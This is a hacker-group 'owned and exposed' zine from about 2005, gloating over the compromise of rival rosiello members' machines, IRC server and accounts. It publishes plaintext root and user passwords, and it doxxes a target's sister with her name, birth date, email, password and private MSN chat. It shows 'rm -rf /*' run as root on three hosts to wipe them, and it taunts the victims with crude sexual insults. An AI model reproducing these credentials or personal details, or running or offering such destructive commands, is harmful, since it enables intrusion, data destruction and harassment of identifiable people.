S rave 4347 0.0 1.7 62644 9028 ? Sl 17:09 0:00 /usr/lib/evolution/2.2/evolution-alarm-notify --oaf-activate-iid=OAFIID:GNOME_Evolution_Calendar_AlarmNotify_Factory:2.2 --oaf-ior-fd=47 rave 4374 0.5 8.6 51996 44660 ? S 17:10 1:43 gedit file:///home/rave/Desktop/TODO rave 4380 0.0 5.1 65416 26476 ? Sl 17:10 0:18 kopete rave 4382 0.0 1.8 22364 9320 ? Ss 17:10 0:00 kdeinit Running... rave 4386 0.0 1.6 22044 8776 ? S 17:10 0:00 kdeinit: dcopserver --nosid --suicide rave 4388 0.0 1.8 23700 9624 ? S 17:10 0:00 kdeinit: klauncher rave 4390 0.0 2.2 25500 11764 ? S 17:10 0:01 kdeinit: kded rave 4398 0.1 7.1 115428 36820 ? Sl 17:10 0:26 /usr/lib/mozilla-firefox/firefox-bin -a firefox rave 4425 0.0 2.6 29948 13784 ? S 17:10 0:00 kdeinit: knotify rave 4520 0.5 3.0 28256 15836 ? S 17:16 1:51 konsole rave 4521 0.0 0.3 3116 1764 pts/0 Ss+ 17:17 0:00 /bin/bash rave 4531 0.0 0.3 3188 1832 pts/1 Ss+ 17:17 0:00 /bin/bash root 16032 0.0 0.1 2340 916 pts/3 Ss 18:53 0:00 su - root 16033 0.0 0.2 2684 1524 pts/3 S+ 18:53 0:00 -su root 16062 0.0 0.2 3372 1452 ? Ss 18:54 0:00 /usr/sbin/sshd rave 21768 0.0 0.3 3080 1728 ? S 20:37 0:00 ispell -a -S -C rave 22890 0.0 1.6 18596 8500 ? S 20:57 0:00 /usr/lib/nautilus/nautilus-throbber --oaf-activate-iid=OAFIID:Nautilus_Throbber_Factory --oaf-ior-fd=51 root 24173 0.0 0.3 6052 1764 ? Ss 22:25 0:00 sshd: rave [priv] rave 24178 0.0 0.3 6200 1848 ? 
S 22:25 0:00 sshd: rave@pts/2 rave 24179 0.0 0.3 2760 1612 pts/2 Ss 22:25 0:00 -bash root 24363 0.0 0.1 2056 876 pts/2 S 22:37 0:00 su - root 24368 0.0 0.2 2700 1536 pts/2 S 22:37 0:00 -su root 24436 0.0 0.1 2496 856 pts/2 R+ 22:41 0:00 ps aux [4] localhost.localdomain (192.168.0.10) owned & exposed debian:/var/www# ssh 192.168.0.10 -l rave Password: Last login: Mon Aug 15 00:23:26 2005 from 192.168.0.6 rave@debian:~$ uname -a; id Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux uid=1000(rave) gid=1000(rave) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(rave) rave@debian:~$ echo "Once again.. DEBIAN" Once again.. DEBIAN rave@debian:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 1504 512 ? S Aug14 0:00 init [5] root 2 0.0 0.0 0 0 ? SN Aug14 0:00 [ksoftirqd/0] root 3 0.0 0.0 0 0 ? S< Aug14 1:01 [events/0] root 4 0.0 0.0 0 0 ? S< Aug14 0:00 [khelper] root 23 0.0 0.0 0 0 ? S< Aug14 0:00 [kblockd/0] root 45 0.0 0.0 0 0 ? S Aug14 0:00 [pdflush] root 46 0.0 0.0 0 0 ? S Aug14 0:00 [pdflush] root 48 0.0 0.0 0 0 ? S< Aug14 0:00 [aio/0] root 47 0.0 0.0 0 0 ? S Aug14 0:01 [kswapd0] root 190 0.0 0.0 0 0 ? S Aug14 0:00 [kseriod] root 211 0.0 0.0 0 0 ? S< Aug14 0:00 [ata/0] root 296 0.0 0.0 0 0 ? S Aug14 0:00 [kjournald] root 332 0.0 0.2 1492 460 ? S~<| | | /'\| |/'\.. /~\| | | | \ | =[@]= | | \ | | | | | \ | ~ ~ ~ ~ |` ) | / \ / \ / \ _____ / |--//''`\--| | (( +==)) | |--\_|_//--| [Welcome to] *~> Rosiello FTPD <~* code by: Johnny mast modded by: dikline email: rave@rosiello.org Thank you for choosing to rm -rf /* with us. figure out the rest.. [8] raves master planes to own dikline rave info about decline: they run debian 3.0 <-- w0ah, nmap skills! Darkeagle yes <-- actually FBSD... rave you can own them ur self <-- really ? rave take a proxy rave and join under a diff nick #decline <-- you figured that out by yourself? rave @ gotphracked.com <-- uhm.. 
dikline.com rave then stay there realy long <-- /kick rave make up a project where you need root for <-- Yes! Hello stranger! here is the root pass for dk.com rave make you have root for more then 6+ monts <-- uhm.. didnt understand that rave and then out of the blue own them <-- :( rave thats what i do <-- Im impressed! rave with my enamy`s <-- your dad beat you up ? w0aaahh!! Shit... we are in big trouble.. please rave dont own us with your 1337 social skills :( [9] raves 1337 tips to Internet hacking! rave an other fake " im so friendly joined #rosiello" rave just play stupid <-- Play ? rave is the hacker who is smart <-- yes grasshopper.. rave now im the hacker !! <-- when did you become a hacker? rave make him feel like in charge rave then own him <-- what is the world coming to?! :( rave its as easy as that <-- If you say so rave thats the secret <-- nice secret rave remember play the fool !! <-- like you ? rave rosiello is smart <-- No doubt rave i just play stupid <-- you just "play" stupid rave just play stupid <-- Havent you said that enough now ? rave that the lesson rosiello learned <-- So you guys PRETEND that you are stupid? rave we are NOT stupid <-- OK OK OK OK OK I GET IT YOU ARE NOT STUPID rave it was boobys who fucked us rave we owned them <-- Just like we owned you ? rave just because whe could controle our selfs <-- Lets see how controled you will be when I rm -rf / rave you need to learn to controle ur self to engeneer ur attackers rave since these ppl are kids <-- Then I guess you got owned by kids rave and even more then boobys is/was rave we aint stupid <-- Havent you said that enough ? rave every nick has been googled for <-- Thats alot of googling. 
rave the account to boobys :D <-- Which you sucked alot of dick for rave private:mecyme :D rave thats how i got in <-- I can still feel the taste of cum in my mouth rave its the brain Darky <-- And alot of dick sucking rave got.phracked should not never be a problem <-- we just owned your ass and its DIKLINE now. And it goes on and on about how rosiello aint stupid... You can download all of raves irclogs at: http://oral-sex.bz/~gotraved/xchatlogs.tar.gz If you look hard enough you will even find shit like: Jun 19 17:42:09 Darkeagle h: darkeagle.linkin-park.cc Jun 19 17:42:12 Darkeagle u: rave Jun 19 17:42:17 Darkeagle p: raverocks Jun 19 17:42:19 Darkeagle port:22 Jun 19 17:42:27 Darkeagle keep it <-- I will Thanks to |silent for hosting =) [10] raves 1337 passwords When you are giving out 1337 hacking tips to your friends, running a maaajor ftp developement and.. just dicking around.... its good to chose good passwords! ssh www.rosiello.net -l root password: supp3rmaninspace rave pass: godsmack ssh 192.168.0.6 -l root password: supp3rmaninspace rave pass: A390kb ssh 192.168.0.10 -l root password: supp3rman Let me guess.. Fave childhood superhero is superman ? [11] raves sister gets owned & exposed First Name : amanda Last Name : mast Birth date : 27 December 1987 Country : Netherlands email : mastamanda@hotmail.com Password : iloveyou logging into mastamanda@hotmail.com... Conversation with plurk01@hotmail.com at 2005-08-18 23:01:59 on mastamanda@hotmail.com (msn) (23:01:59) Trashed and scattered again, I'm feelin' so low!: dat is al weer snel :) (23:02:18) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: :) <-- lol nice nick raves sister! (23:02:21) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: Ich bin geil .. <-- I am horny (I think?) (23:03:13) Trashed and scattered again, I'm feelin' so low!: ooow (23:03:17) [â ]||αмαиâα||[â ] .... 
[WoW] + //\\ [R]omanti[C] [N]o love ]: ;) (23:03:19) Trashed and scattered again, I'm feelin' so low!: hoe komt dat zo ? :P <-- translation ? (23:03:39) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: I brake up... (23:03:54) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: I love sn1ffle (23:04:03) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: and dikline so much .. Im sorry (23:04:31) Trashed and scattered again, I'm feelin' so low!: wtf nu even nederlands (23:04:36) [â ]||αмαиâα||[â ] .... [WoW] + //\\ [R]omanti[C] [N]o love ]: ja (23:04:47) Trashed and scattered again, I'm feelin' so low!: ik wil ? :P uhm... *close conversation window* I guess I should have payed better attention In class ? New MSN password: Superm4n5678 [12] the rm -rf /* Well. we have had our fun, defaced rosiello.org, changed eftp, got everything we wanted from rave. Now its my for the thing that you have all been waiting for! THE RM -RF /* Raves laptop gets rm -rf /* : debian:/home# ssh 192.168.0.6 The authenticity of host '192.168.0.6 (192.168.0.6)' can't be established. RSA key fingerprint is 16:c2:70:b2:0f:4c:52:b4:9f:fa:2c:39:64:8c:72:75. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.0.6' (RSA) to the list of known hosts. 
Password: Last login: Sat Aug 13 20:56:12 2005 debian:~# rm -rf /* rm: cannot remove directory `/dev/shm': Device or resource busy rm: cannot remove `/dev/pts/0': Operation not permitted rm: cannot remove directory `/dev/.static/dev': Device or resource busy debian:~# ls -bash: ls: command not found Rosiello.net gets rm -rf /* : debian:/home# uname -a; id Linux debian.rosiello.net 2.4.27-2-386 #1 Thu Jan 20 10:55:08 JST 2005 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) debian:/home# rm -rf /* rm: cannot remove `/dev/pts/5': Operation not permitted rm: cannot remove `/dev/pts/6': Operation not permitted rm: cannot remove directory `/dev/shm': Device or resource busy debian:/home# ls -bash: /bin/ls: No such file or directory debian:/home# uname -a -bash: /bin/uname: No such file or directory And this other box gets rm -rf /* : debian:/var/www# ssh 192.168.0.10 Password: Last login: Wed Aug 17 18:15:09 2005 from 192.168.0.6 debian:~# uname -a; id Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) debian:~# echo "BYE RAVE" BYE RAVE debian:~# rm -rf /* rm: cannot remove directory `/dev/shm': Device or resource busy rm: cannot remove `/dev/pts/0': Operation not permitted rm: cannot remove directory `/dev/.static/dev': Device or resource busy rm: cannot remove `/proc/asound/pcm': Operation not permitted rm: cannot remove `/proc/asound/timers': Operation not permitted rm: cannot remove `/proc/asound/modules': Operation not permitted rm: cannot remove `/proc/asound/cards': Operation not permitted rm: cannot remove `/proc/asound/devices': Operation not permitted rm: cannot remove `/proc/asound/version': Operation not permitted rm: cannot remove `/proc/asound/seq/drivers': Operation not permitted rm: cannot remove `/proc/asound/oss/sndstat': Operation not permitted rm: cannot remove `/proc/asound/oss/devices': Operation not permitted rm: `/proc/ide/hdc' changed dev/ino: Operation not permitted debian:~# ls 
-bash: /bin/ls: No such file or directory debian:~# w -bash: w: command not found debian:~# uname -a -bash: /bin/uname: No such file or directory [13] Conclusion 11:14 -!- Irssi: Looking up irc.rosiello.net 11:14 -!- Irssi: Connecting to irc.rosiello.net [212.127.146.168] port 6667 11:14 -!- Irssi: Connection to irc.rosiello.net established 11:14 !irc.rosiello.net *** Looking up your hostname... 11:14 !irc.rosiello.net *** Found your hostname 11:14 !irc.rosiello.net *** If you are having problems connecting due to ping timeouts, please type /quote pong 81725818 or /raw pong 81725818 now. 11:14 -!- Welcome to the rosiello security network (RSN) IRC Network g0g0_!n0@dikline.com 11:14 -!- Your host is irc.rosiello.net, running version Unreal3.2.3 11:14 -!- This server was created Wed Jul 27 2005 at 17:09:52 GMT 11:14 -!- irc.rosiello.net Unreal3.2.3 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj 11:14 -!- SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 are supported by this server 11:14 -!- SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=rosiello-security-network-(RSN) CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server 11:14 -!- There are 24 users and 78 invisible on 8 servers 11:14 -!- 15 operator(s) online 11:14 -!- 40 channels formed 11:14 -!- I have 5 clients and 2 servers 11:14 -!- Current Local Users: 5 Max: 17 11:14 -!- Current Global Users: 102 Max: 124 11:14 -!- - irc.rosiello.net Message of the Day - 11:14 -!- - 19/8/2005 16:02 11:14 -!- - ***** ** ***** 11:14 -!- - ****** *** ****** 11:14 -!- - ** * * *** ** * * ** ~Welcome to another HI-Jacked IRCD. 
11:14 -!- - * * * *** * * * **** * W-E L-O-V-E R-A-V-E 11:14 -!- - * * *** * * **** 11:14 -!- - ** ** ** ** ** * ** 11:14 -!- - ** ** ** ** ** * You're admin's for the day: 11:14 -!- - ** ** ** ** ***** 11:14 -!- - ** ** ** ** ** *** 11:14 -!- - ** ** ** ** ** *** // fmrj@dikline.com 11:14 -!- - * ** ** * ** *** // g0g0@dikline.com 11:14 -!- - * * * *** 11:14 -!- - ***** * **** *** 11:14 -!- - * ********* * ***** *** * ..DO YOU FEEL SAFE YET? 11:14 -!- - * **** * *** *** 11:14 -!- - * * 11:14 -!- - ** ** 11:14 -!- - 11:14 -!- - ... Blend in. - Get trusted - Trust no-one. - Own everyone. 11:14 -!- - ... Disclose nothing. - Destroy everything. - Take back the scene. 11:14 -!- - 11:14 -!- - For the full rosiello exposure, please visit: 11:14 -!- - 11:14 -!- - [ WWW.DIKLINE.COM ] 11:14 -!- - 11:14 -!- End of /MOTD command. 11:14 -!- Mode change [+iwx] for user g0g0_ 11:14 -!- Irssi: Your nick is owned by g0g0 [g0g0@rosielloBl4Ckb0x-72D69544.idstelcom.net] 11:14 -!- You're now known as fmrj 11:14 -!- Mode change [+oghaAsNt] for user fmrj 11:14 -!- Server notice mask (+kcfvGqso) 11:14 -!- You are now an IRC Operator 11:14 !irc.rosiello.net *** Global -- from OperServ: fmrj is now an IRC operator. 11:15 !irc.rosiello.net *** Notice -- Client connecting on port 6697: nanonyme (nanonyme@cm-84.210.197.006.chello.no) [clients] [secure AES256-SHA] YOU ARE ALL SNIFFED, LOGGED, MONITORED & OWNED RAVE IS A FUCKING 12 YEAR OLD WITH A BIG MOUTH, DO US ALL A FAVOUR AND SHUT THE FUCK UP 18:44 < jmos45> we should own their site.. -> you wait until n0tm3! also, if rave could email me and say something like "Sorry for all bullshit ive called you guys" that would be nice! - contact: flsh@dikline.com